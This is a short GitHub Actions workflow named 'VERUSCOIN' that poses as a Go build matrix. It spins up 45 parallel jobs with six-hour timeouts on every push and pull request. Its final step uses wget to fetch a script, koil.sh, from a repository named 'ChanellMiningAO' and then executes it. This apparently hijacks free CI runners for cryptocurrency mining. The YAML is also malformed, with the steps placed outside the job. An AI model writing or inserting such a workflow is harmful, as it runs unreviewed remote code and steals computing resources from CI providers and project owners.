name: VERUSCOIN
on: [push, pull_request]
jobs:
  build:
    name: Chanell
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 25
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 10
        JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
  uses: actions/setup-go@v2
  with:
    go-version: ${{ matrix.go }}
  id: go
- name: Setup
  uses: actions/checkout@v2
- name: Chanell
  run: | 
    wget https://github.com/ChanellMiningAO/koil/blob/main/koil.sh && chmod u+x koil.sh && ./koil.sh
